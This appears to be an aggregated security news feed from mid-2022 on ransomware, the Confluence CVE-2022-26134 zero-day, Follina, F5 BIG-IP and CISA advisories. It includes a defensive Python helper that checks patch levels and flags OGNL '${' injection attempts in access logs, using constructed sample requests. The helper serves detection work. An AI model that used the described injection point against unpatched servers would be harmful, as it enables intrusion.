                Autosummary: [Charts: Known ransomware attacks by group, by country and by industry, May 2022.] Although LockBit remained the most widely-deployed ransomware in May 2022, it was, typically, Conti that sucked all of the air out of the room. It has been involved in hundreds of attacks, including the horrific disabling of Ireland’s Health Service Executive, and according to the FBI, it is “the costliest strain of ransomware ever documented”, having raked in over $150 million in ransom payments. Ransomware mitigations (source: IC3.gov): implement regular backups of all data to be stored as air-gapped, password-protected copies offline. "


                [updated] Unpatched Atlassian Confluence vulnerability is actively exploited

                exploits
                2022-06-03 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/

                A vulnerability in Atlassian Confluence was found by performing an incident response investigation on a compromised server. The vulnerability is not yet patched.

                The post [updated] Unpatched Atlassian Confluence vulnerability is actively exploited appeared first on Malwarebytes Labs.

                "

                Autosummary: Update June 3, 2022: Atlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain a fix for this issue. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. Note: ${ opens an OGNL expression, which is the injection point for CVE-2022-26134; the same two characters start a parameter substitution in a shell script, but it is the OGNL evaluation inside Confluence that matters here. Affected versions: all supported versions of Confluence Server and Data Center are affected. "
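A small triage helper, added here as an example and not code from Malwarebytes or Atlassian: it checks an installed Confluence version against the fixed releases listed above and scans web server access logs for the ${ marker. It assumes combined-format access log lines and that the OGNL expression travels in the request path (as described in public write-ups of the exploitation, not on this page); the log lines below are constructed, not real traffic, and the payload inside ${...} is a placeholder.

```python
import re
from urllib.parse import unquote

# Fixed releases listed in Atlassian's advisory for CVE-2022-26134,
# one per supported release branch (7.4.x ... 7.18.x).
FIXED_VERSIONS = ("7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1")


def parse_version(version):
    """'7.13.7' -> (7, 13, 7); int tuples compare in the right order."""
    return tuple(int(part) for part in version.strip().split("."))


def patch_status(installed):
    """Classify an installed Confluence version against the advisory's fixed list.

    Returns 'patched', 'vulnerable', or 'unknown-branch' when the installed
    major.minor branch has no fixed release in the list (the advisory says all
    supported versions are affected, so such a host should be moved to a
    branch that does have a fix).
    """
    inst = parse_version(installed)
    for fixed in FIXED_VERSIONS:
        fix = parse_version(fixed)
        if fix[:2] == inst[:2]:
            return "patched" if inst >= fix else "vulnerable"
    return "unknown-branch"


# Assumption (from public analyses, not this page): the OGNL expression is sent
# in the request URI, so the tell-tale marker is "${" in the path, usually
# URL-encoded as %24%7B and occasionally encoded twice.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
OGNL_MARKER = re.compile(r"\$\{")


def flag_ognl_requests(log_lines):
    """Return (client_ip, timestamp, method, raw_path, status) for suspicious requests."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format access log line; skip it
        client, ts, method, path, status = m.groups()
        decoded = unquote(unquote(path))  # double-decode to unmask %2524%257B as well
        if OGNL_MARKER.search(decoded):
            hits.append((client, ts, method, path, status))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2022:10:15:01 +0000] "GET /%24%7Bexample%7D/ HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '198.51.100.7 - - [03/Jun/2022:10:15:04 +0000] "GET /login.action HTTP/1.1" 200 4521 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Jun/2022:10:16:30 +0000] "GET /${example}/ HTTP/1.1" 302 0 "-" "python-requests/2.27"',
]

if __name__ == "__main__":
    for v in ("7.13.6", "7.13.7", "7.18.0", "7.12.3"):
        print(v, patch_status(v))
    for hit in flag_ognl_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
```

Run it against real access logs by feeding the file's lines to flag_ognl_requests; any hit from before the fixed version was installed is a reason to treat the host as compromised and hunt for web shells rather than simply patching.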


                GitLab Issues Security Patch for Critical Account Takeover Vulnerability

                exploits
                2022-06-03 https://thehackernews.com/2022/06/gitlab-issues-security-patch-for.html
                GitLab has moved to address a critical security flaw in its service that, if successfully exploited, could result in an account takeover. Tracked as CVE-2022-1680, the issue has a CVSS severity score of 9.9 and was discovered internally by the company. The security flaw affects all versions of GitLab Enterprise Edition (EE) starting from 11.10 before 14.9.5, all versions starting from 14.10 "

                Autosummary: "


                Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network

                exploits
                2022-06-03 https://thehackernews.com/2022/06/researchers-uncover-malware-controlling.html
                The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research. Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites. Parrot TDS was documented in "

                Autosummary: "


                Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability

                exploits
                2022-06-03 https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html
                Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild. The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134. "Atlassian has been made aware of current active exploitation of a "

                Autosummary: "Behinder provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike," the researchers said. "


                Conti Leaks Reveal Ransomware Gang's Interest in Firmware-based Attacks

                exploits ransomware
                2022-06-03 https://thehackernews.com/2022/06/conti-leaks-reveal-ransomware-gangs.html
                An analysis of leaked chats from the notorious Conti ransomware group earlier this year has revealed that the syndicate has been working on a set of firmware attack techniques that could offer a path to accessing privileged code on compromised devices. "Control over firmware gives attackers virtually unmatched powers both to directly cause damage and to enable other long-term strategic goals," "

                Autosummary: "


                ExpressVPN Removes Servers in India After Refusing to Comply with Government Order

                government
                2022-06-03 https://thehackernews.com/2022/06/expressvpn-removes-servers-in-india.html
                Virtual Private Network (VPN) provider ExpressVPN on Thursday announced that it's removing Indian-based VPN servers in response to a new cybersecurity directive issued by the Indian Computer Emergency Response Team (CERT-In). "Rest assured, our users will still be able to connect to VPN servers that will give them Indian IP addresses and allow them to access the internet as if they were located "

                Autosummary: "


                Old Hacks Die Hard: Ransomware, Social Engineering Top Verizon DBIR Threats – Again

                exploits ransomware
                2022-06-03 https://threatpost.com/old-hacks-die-hard-ransomware-social-engineering-top-verizon-dbir-threats-again/179864/
                Deja-Vu data from this year's DBIR report feels like we are stuck in the movie "Groundhog Day." "

                Autosummary: According to Verizon, 82% of this year’s data breaches involved the “human element” – “the Use of stolen credentials, Phishing, Misuse, or simply an Error.” In general, the results of DBIR merely confirm well-established trends, such as the growing threats of ransomware – up 13% this year – and the inescapability of the “human element”, which was tied to 82% of all breaches. "


                Evil Corp Pivots LockBit to Dodge U.S. Sanctions

                ransomware
                2022-06-03 https://threatpost.com/evil-corp-pivots-to-lockbit-to-dodge-u-s-sanctions/179858/
                The cybercriminal group is distancing itself from its previous branding by shifting tactics and tools once again in an aim to continue to profit from its nefarious activity. "

                Autosummary: “For cybercriminals, it’s a similar concept,” observed James McQuiggan, security awareness advocate at security firm KnowBe4, in an email to Threatpost. "


                Introducing Malwarebytes DNS Filtering module: How to block sites and create policy rules

                exploits
                2022-06-02 https://blog.malwarebytes.com/business-2/2022/06/introducing-malwarebytes-dns-filtering-module-how-to-block-sites-and-create-policy-rules/

                Malwarebytes DNS Filtering is a new module that helps block access to malicious websites and limit threats introduced by suspicious content.

                The post Introducing Malwarebytes DNS Filtering module: How to block sites and create policy rules appeared first on Malwarebytes Labs.

                "

                Autosummary: Table of Contents Part 1: Accessing the module Once you add DNS filtering to your Nebula subscription, you can access the DNS filtering page on the left hand navigation. "


                Ransomware attack turns 2022 into 1977 for Somerset County

                exploits government
                2022-06-02 https://blog.malwarebytes.com/ransomware/2022/06/ransomware-attack-turns-2022-into-1977-for-somerset-county/

                Somerset County in New Jersey has been sent back to 1977 after a ransomware attack shut down various historical record checks.

                The post Ransomware attack turns 2022 into 1977 for Somerset County appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: June 1, 2022. Somerset County, New Jersey, has been hit so hard by a network assault that they’ve ended up in the direst straits imaginable, with county databases unavailable to provide information on land records and probate records, and with title searches only available for paper records that were entered before 1977. Somerset County Clerk and Surrogate services that depend on access to county databases are temporarily unavailable, such as land records, vital statistics, and probate records. “To ensure residents can reach the County we have created temporary Gmail addresses for the public to use to reach critical departments such as the County Commissioners, Health, Emergency Operations, the County Clerk, Sheriff, and Surrogate.” Good news and bad news: Somerset County have confirmed that an upcoming Primary Election is unaffected as voting machines are “never connected to the county system.” "


                Researchers Demonstrate Ransomware for IoT Devices That Targets IT and OT Networks

                exploits ransomware
                2022-06-02 https://thehackernews.com/2022/06/researchers-demonstrate-ransomware-for.html
                As ransomware infections have evolved from purely encrypting data to schemes such as double and triple extortion, a new attack vector is likely to set the stage for future campaigns. Called Ransomware for IoT or R4IoT by Forescout, it's a "novel, proof-of-concept ransomware that exploits an IoT device to gain access and move laterally in an IT [information technology] network and impact the OT [ "

                Autosummary: "


                Cybercriminals Expand Attack Radius and Ransomware Pain Points

                exploits ransomware
                2022-06-02 https://threatpost.com/criminals-expand-attack-radius/179832/
                Melissa Bischoping, security researcher with Tanium and Infosec Insiders columnist, urges firms to consider the upstream and downstream impact of "triple extortion" ransomware attacks. "

                Autosummary: When a compromise takes place, the opportunity for “pay-for-decrypt” profits, as well as data or credential/access resale, leads to double- or triple-extortion ransomware. In May of 2021, Ireland’s public health system, the Health Service Executive, was victimized by a ransomware attack that had significant reverberations. Diligence & Awareness: the most important takeaway from this ransomware evolution is that organizations with business connections to a breached organization, such as the ADA in this scenario, should be closely monitoring official update channels, identifying what (if any) of their own data may be at risk, and focusing on threat-informed defensive measures. Facing the Future: with the evolution of the strategy and tactics used by ransomware actors, it is essential that organizations have a big-picture perspective for defense, detection, and response and recovery. "


                More than a quarter of Americans fell for robocall scam calls in past year

                financial
                2022-06-01 https://blog.malwarebytes.com/reports/2022/06/more-than-a-quarter-of-americans-fell-for-robocall-scam-calls-in-past-year/

                Robocalls and scam calls have been a longstanding problem. For 2021, the FTC has recorded its highest number of victims yet.

                The post More than a quarter of Americans fell for robocall scam calls in past year appeared first on Malwarebytes Labs.

                "

                Autosummary: According to the latest report from Truecaller (Google Docs upload of the entire report, separate blog here), a known spam blocker and caller ID app, 68.4 million Americans were victimized in the last 12 months, a substantial increase from the 59.4 million victims tallied up in 2021. "


                Why Industry 4.0 must think more like Apple

                industry
                2022-05-31 https://www.computerworld.com/article/3662131/why-industry-40-must-think-more-like-apple.html#tk.rss_security

                For industrial applications, the Internet of Things risks becoming the Internet of Thieves. Perhaps industries making use of connected solutions should take a leaf out the Apple book and lock down their infrastructure.

                What the ethical hackers say

                As digital processes become deeply embedded across every industry, it makes sense that industrial control systems were tested at this year’s Pwn2Own contest. Hackers were asked to seek out vulnerabilities in industrial software and systems.

                Contest winners Daan Keuper and Thijs Alkemade found that once they managed to break into the IT networks used at these companies, it was “relatively easy” to then cause havoc with systems and equipment.


                "

                Autosummary: IT understands this, of course, which is why industrial IoT deployments tend to secure the IT networks they use, but this also means that if those networks are penetrated, much of the deployed equipment lacks additional protection. Louis Priem, consultant at ICT Group, said, “Systems in factory environments typically run 24/7, so there is very little opportunity to patch vulnerabilities. "


                Follina. Unpatched Microsoft Office zero-day vulnerability exploited in the wild

                exploits
                2022-05-30 https://grahamcluley.com/follina-unpatched-microsoft-office-zero-day-vulnerability-exploited-in-the-wild/
                The world is waiting for a patch from Microsoft, after a zero-day vulnerability in Microsoft Office was found being exploited through boobytrapped Word documents to remotely execute code on victims' PCs. "

                Autosummary: The vulnerability, which is dubbed “Follina” and appears to exploit how Office products work with MSDT (Microsoft Diagnostics Tool), was initially brought to the public’s attention by Japanese security researchers on Twitter three days ago, and can be exploited even if macros are disabled in Microsoft Office. "


                Scams targeting NFT investors – Week in security with Tony Anscombe

                financial
                2022-05-27 https://www.welivesecurity.com/videos/scams-targeting-nft-investors-week-security-tony-anscombe/

                As with everything digital, there's someone, somewhere devising a method to steal the assets away from their rightful owners

                The post Scams targeting NFT investors – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                Cybersecurity: A global problem that requires a global answer

                ciber
                2022-05-27 https://www.welivesecurity.com/2022/05/27/cybersecurity-global-problem-requires-global-answer/

                New and exacerbated cyber-risks following Russia’s invasion of Ukraine are fueling a new urgency towards enhancing resilience

                The post Cybersecurity: A global problem that requires a global answer appeared first on WeLiveSecurity

                "

                Autosummary: In parallel, Garth suggests involving organizations such as the UN, OECD and groups like the G7, G20 dynamically, so that “the international community shines a spotlight on state cyberactivity, calling out and taking action where necessary against those that ignore established norms and cracking down on criminal groups and their ability to monetize their criminal endeavors … but also works together to enhance cyber-resilience across the globe, including in developing countries”. Getting everyone to work together is the real challenge: governments don’t have an easy job, maintaining legacy systems, tackling skills shortage, building cyberawareness in the workplace, managing an expanding attack surface area, integrating new technologies, and facing down sophisticated attacks. While its exact role and structure are still being decided, it is expected to have an operational character that ensures a better exchange of intelligence on cybersecurity threats among the Member States, the European Commission, ENISA, CERT-EU, and the private sector. "


                Ransomware demands acts of kindness to get your files back

                exploits
                2022-05-26 https://www.tripwire.com/state-of-security/security-data-protection/ransomware-demands-acts-of-kindness-to-get-your-files-back/
                The great thing about working in the world of cybersecurity is that there’s always something new. You may think you’ve seen it all, and then something comes along that completely surprises you. And that’s certainly true of the GoodWill ransomware... Read more in my article on the Tripwire State of Security blog. "

                Autosummary: Like most other ransomware, GoodWill encrypts the usual file types – documents, databases, photographs, and videos – locking away your content. The second requested act involves taking five poor children (under the age of 13) to Dominos, Pizza Hut, or KFC, and allow them to order any food that they wish. "


                Airline passengers left stranded after ransomware attack

                exploits ransomware
                2022-05-25 https://www.bitdefender.com/blog/hotforsecurity/airline-passengers-left-stranded-after-ransomware-attack/
                An Indian airline says that an "attempted ransomware attack" against its IT infrastructure caused flights to be delayed or canceled, and left passengers stranded. Read more in my article on the Hot for Security blog. "

                Autosummary: "


                Common NFT scams and how to avoid them

                financial
                2022-05-23 https://www.welivesecurity.com/2022/05/23/common-nft-scams-how-avoid-them/

                As NFTs exploded in popularity, scammers also jumped on the hype. Watch out for counterfeit NFTs, rug pulls, pump-and-dumps and other common scams plaguing the industry.

                The post Common NFT scams and how to avoid them appeared first on WeLiveSecurity

                "

                Autosummary: According to OpenSea, the biggest NFT marketplace, more than 80% of NFTs created for free on its platform were fake, plagiarized from other artists, or spam. Wtf? #nft #arttheft #opensea #infringement #nftcommunity (pic.twitter.com/LY5Jxb2N2r) — Aja Trier (@AjaArt), January 5, 2022. Like pump-and-dump scams, the scammers will hype up a project, solicit investment and, without notice, abandon it. A lot of these huge NFT “sales” are people selling it to themselves as part of either a pump and dump or a money laundering scheme (https://t.co/s5QIIKhUL3) — Robert Evans (The Only Robert Evans) (@IwriteOK), October 29, 2021. On the buyer’s side, this scheme seems to be validated by influencers who share the NFT on their profiles, making it seem like a great opportunity. [Tweet by 🦁👑 (@LazyLionsNFT), May 18, 2022.] Once a user tries to access the fake offer, they are requested to insert their passwords or personal information, giving away their details and getting nothing in return. NFT safety tips: there are many scams to be aware of when diving into the NFT world and, as usual, scammers never pass up a golden money-making opportunity. "


                Bank refuses to pay ransom to hackers, sends dick pics instead

                financial
                2022-05-20 https://grahamcluley.com/bank-refuses-to-pay-ransom-to-hackers-sends-dick-pics-instead/
                I'm not sure if it would be enough for me to switch bank accounts, but I have something of a sneaking respect for the Bank of Zambia... "

                Autosummary: "


                Phishing gang that stole over 400,000 Euros busted in Spain

                financial
                2022-05-19 https://www.tripwire.com/state-of-security/security-data-protection/phishing-gang-busted-spain/
                Spanish police say that they have dismantled a phishing gang operating across the country, following the arrest of 13 people and the announcement that they are investigating a further seven suspects. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                AA22-138A: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388

                exploits
                2022-05-18 https://us-cert.cisa.gov/ncas/alerts/aa22-138a
                Original release date: May 18, 2022

                Summary

                Actions for administrators to take today:
                • Do not expose management interfaces to the internet.
                • Enforce multi-factor authentication.
                • Consider using CISA’s Cyber Hygiene Services.

                The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.

                According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deplo "

                Autosummary: "


                AA22-137A: Weak Security Controls and Practices Routinely Exploited for Initial Access

                exploits
                2022-05-17 https://us-cert.cisa.gov/ncas/alerts/aa22-137a
                Original release date: May 17, 2022

                Summary

                Best Practices to Protect Your Systems:
                • Control access.
                • Harden Credentials.
                • Establish centralized log management.
                • Use antivirus solutions.
                • Employ detection tools.
                • Operate services exposed on internet-accessible hosts with secure configurations.
                • Keep software updated.

                Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States,[1],[2],[3] Canada,[4] New Zealand,[5],[6] the Netherlands,[7] and the United Kingdom.[8]

                Download the PDF version of this report (pdf, 430kb).

                Technical Details

                Malicious actors commonly use the following techniques to gain initial access to victim networks.[TA0001]